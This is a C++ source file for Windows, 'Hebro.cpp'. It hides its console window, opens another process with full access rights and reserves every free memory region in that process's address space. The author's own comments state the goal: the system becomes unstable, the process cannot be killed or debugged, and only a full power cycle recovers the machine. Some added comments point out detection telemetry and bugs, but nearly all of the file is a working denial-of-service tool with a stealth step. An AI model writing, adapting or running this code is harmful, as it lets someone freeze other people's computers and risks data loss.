Hebro.cpp
#include <Windows.h>
#include <stdio.h>
#include <type_traits>
#include <algorithm>
#include <numbers>
#include <chrono>
#include <thread>
#include <Windows.h>
#include "HebroHelper.h"
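// Small pointer-arithmetic helpers used by the address-space walk in main().
namespace pointer
{
    /// Rounds an address up to the next multiple of `alignment` and returns it as T.
    ///
    /// @tparam T          Result type; expected to be a pointer type (or uintptr_t).
    /// @param anyPointer  Address to round up. It is never dereferenced.
    /// @param alignment   Must be a non-zero power of two: the rounding is done with the
    ///                    mask `alignment - 1`, which is only correct for such values.
    /// @return The smallest address >= anyPointer that is a multiple of alignment.
    ///         An address that is already aligned is returned unchanged.
    ///
    /// The arithmetic is unsigned, so an address within `alignment - 1` bytes of the top
    /// of the address space wraps around instead of failing.
    template <typename T>
    T AlignTop(const void* anyPointer, size_t alignment)
    {
        // The original read an inactive union member to convert between pointer and
        // integer, which is undefined behaviour in C++; reinterpret_cast performs the
        // same conversion with defined semantics.
        const uintptr_t mask = static_cast<uintptr_t>(alignment) - 1u;
        const uintptr_t raw = reinterpret_cast<uintptr_t>(anyPointer);
        const uintptr_t aligned = (raw + mask) & ~mask;
        return reinterpret_cast<T>(aligned);
    }

    /// Advances a pointer by a byte count and returns the result as T.
    ///
    /// @tparam T           Result pointer type.
    /// @tparam U           Integer type of the byte count.
    /// @param anyPointer   Base address. It is never dereferenced.
    /// @param howManyBytes Number of bytes to add to the base address.
    /// @return anyPointer + howManyBytes, converted to T.
    template <typename T, typename U>
    T Offset(void* anyPointer, U howManyBytes)
    {
        // Byte-granular arithmetic needs a char*; void* cannot be incremented portably.
        char* const bytes = static_cast<char*>(anyPointer) + howManyBytes;
        return reinterpret_cast<T>(bytes);
    }
}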
// Hides the console window attached to this process, so the program runs with no
// visible window. The ShowWindow result is ignored.
void HideConsole()
{
    const auto consoleWindow = ::GetConsoleWindow();
    ::ShowWindow(consoleWindow, SW_HIDE);
}
// Entry point. Passes argv[1] to getPID() (defined outside this listing, presumably in
// HebroHelper.h), opens the process with the returned id, and walks a fixed address range,
// reserving every free region it finds inside that process.
//
// By the author's own description in the comments below, the purpose is denial of service
// against the target process and, as a side effect, the whole system. The behaviours a
// defender can key on, all visible in this function, are:
//   - the console window is hidden before anything else happens;
//   - a handle to another process is opened with PROCESS_ALL_ACCESS;
//   - VirtualQueryEx and VirtualAllocEx(MEM_RESERVE, PAGE_NOACCESS) are called against
//     that handle in a tight loop over a large address range, with nothing ever committed
//     or written.
//
// Always returns 0, whether or not a target was found.
int main(int argc, char* argv[] )
{
    // Hide the console window first, so there is nothing on screen while the loop runs.
    HideConsole();
    int pid = 0;
    // NOTE(review): argv[1] is read without checking argc.
    pid = getPID(argv[1]);
    // getPID() returning 0 is treated as "no target" and skips everything below.
    if (pid != 0) {
        // Requests every access right on the target. The call only succeeds if the caller is
        // permitted that access to the target process, so this is where process access control
        // applies and where process-access telemetry (e.g. Sysmon ProcessAccess events) would
        // record the request.
        // NOTE(review): the returned handle is not checked for NULL before use.
        HANDLE proc = ::OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
        // Step used to align each probed address (64 KiB).
        const size_t alignment = 64u * 1024u;
        // chosen to make the loop "overflow", starting from 0x0 again.
        // this will reserve every possible memory region in the target process.
        // once everything has been reserved, the call to ::VirtualAllocEx will hang and never return.
        // this creates instability across the whole Windows system, making it impossible to kill this process, or sometimes even start new processes.
        // Rebooting no longer works.
        // Debugging this process doesn't work.
        // A full power cycle is required!
        const void* addressStart = (const void*)0x00007FFF7FF00000;
        const void* addressEnd = (const void*)0x000080007FF00000;
        // The loop has no increment expression: 'address' is advanced at the bottom of the body
        // from the region information returned by VirtualQueryEx.
        for (const void* address = addressStart; address < addressEnd; /* nothing */)
        {
            // align address to be scanned
            address = pointer::AlignTop<const void*>(address, alignment);
            // Zero-initialised so the fields read below are defined even if the query fails.
            ::MEMORY_BASIC_INFORMATION memoryInfo = {};
            const size_t bytesReturned = ::VirtualQueryEx(proc, address, &memoryInfo, sizeof(::MEMORY_BASIC_INFORMATION));
            // we are only interested in free pages
            if ((bytesReturned > 0u) && (memoryInfo.State == MEM_FREE))
            {
                // Clamp the request so it does not extend past addressEnd.
                const size_t bytesLeft = abs((intptr_t*)addressEnd - (intptr_t*)memoryInfo.BaseAddress);
                const size_t size = std::min<size_t>(memoryInfo.RegionSize, bytesLeft);
                //printf("baseAddress: 0x%p, size: 0x%llX\n", memoryInfo.BaseAddress, size);
                // Reserve-only, no-access request in the *target's* address space: nothing is
                // committed or written, the range just stops being available to the target.
                void* baseAddress = ::VirtualAllocEx(proc, memoryInfo.BaseAddress, size, MEM_RESERVE, PAGE_NOACCESS);
                // The result is only inspected by the disabled debug output below; failures are ignored.
                if (baseAddress)
                {
                    //printf("Reserving virtual memory region at 0x%p with size 0x%llX\n", baseAddress, size);
                }
            }
            // keep on searching
            address = pointer::Offset<const void*>(memoryInfo.BaseAddress, memoryInfo.RegionSize);
        }
        // Only reached if the loop terminates; the author's comment above states that the
        // allocation call eventually hangs instead.
        ::CloseHandle(proc);
        return 0;
    }
    return 0;
}